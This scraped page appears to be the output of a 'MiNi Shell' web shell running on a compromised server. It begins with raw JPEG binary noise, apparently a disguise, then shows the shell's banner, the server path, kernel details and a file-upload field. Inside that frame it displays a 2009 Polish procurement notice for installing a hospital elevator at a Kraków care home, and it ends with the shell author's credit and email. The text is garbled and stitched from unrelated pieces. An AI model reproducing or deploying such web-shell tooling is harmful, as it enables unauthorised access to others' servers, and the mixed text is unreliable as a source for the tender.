JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090209/21720-N-2009.html

<p class="kh_header"><b>Kraków: Dostawa wraz z montażem w istniejącym szybie dźwigowym dźwigu szpitalnego łóżkowego elektrycznego</b><br>
<b>Numer ogłoszenia: 21720 - 2009; data zamieszczenia: 09.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , Łanowa 39, 30-725 Kraków, woj. małopolskie, tel. 012 6532247, faks 012 6590041.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.dpslanowa39.republika.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Dom Pomocy Społecznej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wraz z montażem w istniejącym szybie dźwigowym dźwigu szpitalnego łóżkowego elektrycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia:
a/ dostawa - wraz z montażem w istniejącym szybie dźwigu  szpitalnego,        łóżkowego,  elektrycznego,
b/ wykonanie zasilania w/wym. dźwigu szpitalnego w istniejącym budynku DPS 
2. Zakres zamówienia:
a/ zgłoszenie, w imieniu zamawiającego, zamiaru wykonania remontowych 
    prac budowlanych do  właściwego Urzędu, opłacenie ewentualnych kosztów,
b/ opracowanie dokumentacji techniczno - odbiorczej wymaganej przepisami oraz 
    uzgodnienie  w UDT (opłacanie kosztów),
c/ wykonanie robót murarskich i elektrycznych związanych z montażem dźwigu, 
d/ wykonanie przebudowy szybu w zakresie koniecznym dla wbudowania drzwi 
    automatycznych,
e/ dostawa, montaż i uruchomienie nowego dźwigu,
f/ malowanie szybu i maszynowni  (farby ftalowe i emulsyjne),
g/ ewentualne usprawnienie wentylacji grawitacyjnej,
h/ badanie, odbiór, rejestracja dźwigu na koszt wykonawcy,
i/ przeszkolenie wskazanych przez  zamawiającego pracowników w zakresie 
   obsługi dźwigu oraz awaryjnego uwalniania pasażerów,
j/ przekazanie urządzeń zamawiającemu wraz 2 kompletami DTR, instrukcjami: obsługi,uwalniania + tabliczki znamionowe..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.31.31.00-5, 45.00.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda wniesienia wadium w kwocie 2 500 PLN przed upływem terminu
składania ofert w jednej lub w kilku z form określonych w art. 45 ust. 6 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2007 r. Nr 223, poz. 1655), zwanej dalej Prawem zamówień publicznych. Przepis art. 45 ust. 6 Prawa zamówień publicznych brzmi: 
Art. 45. 6. Wadium może być wnoszone w jednej lub kilku następujących formach: 
1) pieniądzu; 
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
3) gwarancjach bankowych; 
4) gwarancjach ubezpieczeniowych; 
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275). 
2. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy
zamawiającego nr 10 1240 4722 1111 0000 4859 6886 z dopiskiem  - wadium. 
Wadium w formie pieniężnej winno znajdować się na wskazanym rachunku zamawiającego przed upływem terminu składania ofert pod rygorem wykluczenia wykonawcy.
Wadium wniesione w pieniądzu uznaje się za  wniesione z chwilą jego wpłynięcia na wskazane konto zamawiającego.
Kopię dowodu wpłaty wadium potwierdzoną za zgodność z oryginałem przez wykonawcę należy dołączyć do oferty. 
3. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone w oryginale i musi obejmować cały okres związania ofertą, oraz zawierać stwierdzenie, że na pierwsze pisemne żądanie zamawiającego wzywające do zapłaty wadium, zgodnie z warunkami przetargu, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń.
Oryginał dokumentu wadium należy dołączyć do oferty w sposób umożliwiający dokonanie odłączenia i zwrotu oryginału dokumentu bez uszkodzenia oferty. 
Ponadto do oferty należy dołączyć w sposób trwały kopię dokumentu potwierdzoną za zgodność z oryginałem przez Wykonawcę. 
Beneficjentem takich dokumentów jest Dom Pomocy Społecznej przy ul. Łanowej 39 
w Krakowie a złożone poręczenie lub gwarancja muszą zawierać w swojej treści zobowiązanie zgodne z art. 46 ust. 5 Prawa zamówień publicznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W postępowaniu mogą wziąć udział wykonawcy którzy:
a/ złożą ofertę,
b/ spełniają warunki określone w art. 22, ust. 1  ustawy,
c/ nie są wykluczeni z postępowania na podstawie art. 24, ust. 1 i 2  ustawy,
d/ wniosą wadium.
2. Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy:
a/ nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 
    ustawy ,
b/ podlegają  wykluczeniu z postępowania na podstawie art. 24 ust. 1 ustawy,
c/ złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania, 
d/ nie zgodzili się na przedłużenie okresu związania ofertą.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zamawiający żąda załączenia do oferty dokumentów, zgodnie z art. 22 ust. 1 i art. 24 ust. 1 i 2 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych i zgodnie z uregulowaniami rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605) . 
1. Dokumenty potwierdzające, że wykonawca posiada uprawnienia do wykonywania
określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy:
a/ aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie  
do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy 
przed upływem  terminu składania ofert,
b/ oświadczenie, zgodne z art. 22 ust. 1 Pzp, o spełnianiu warunków udziału 
w postępowaniu i niepodleganiu wykluczeniu na podstawie art. 24 ust. 1 i 2 Pzp;
c/ aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego 
oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego  
Ubezpieczenia Społecznego potwierdzającego odpowiednio, że wykonawca 
nie zalega z opłacaniem podatków , opłat oraz składek na ubezpieczenie 
zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem
zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie
w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej 
niż 3 miesiące przed upływem terminu składania ofert.
2. Dokumenty potwierdzające, że wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia:
a/ wykaz prac o tematyce zbieżnej z przedmiotem  zamówienia wykonanych 
w okresie ostatnich  pięciu lat przed dniem wszczęcia postępowania (jeżeli okres  
prowadzenia działalności jest krótszy - wykonanych w tym okresie), z podaniem 
ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów 
potwierdzających, że roboty te zostały wykonane należycie,
b/ wykaz osób, które będą odpowiedzialne za wykonanie zamówienia lub będą 
uczestniczyć w wykonywaniu zamówienia, wraz z zakresem wykonywanych 
przez nich czynności,
c/ w odniesieniu do osób wyszczególnionych w pkt.2a - udokumentowane 
uprawnienia niezbędne do wykonywania poszczególnych prac lub czynności 
w zakresie określonym w przedmiocie  zamówienia ( odpis decyzji - uprawnienia 
budowlane do kierowania robotami budowlanymi, aktualne zaświadczenie 
z właściwej izby samorządu zawodowego). 
3. Pozostałe dokumenty:
a/ ważne pełnomocnictwo lub upoważnienie do działania w imieniu wykonawcy 
(w przypadku gdy osoby występujące w imieniu wykonawcy nie są wyszczególnione rejestrze sadowym lub wpisie do ewidencji działalności gospodarczej),
Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.
Wykonawca ma obowiązek złożyć dokumenty w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. 
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, stosuje się § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. 
w sprawie Rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy 
oraz form, w jakich te dokumenty mogą być składane..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.dpslanowa39.republika.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej
30-725 Kraków
ul. Łanowa 39.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.03.2009 godzina 09:00, miejsce: Dom Pomocy Społecznej
30-725 Kraków
ul. Łanowa 39
Sekretariat - parter..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com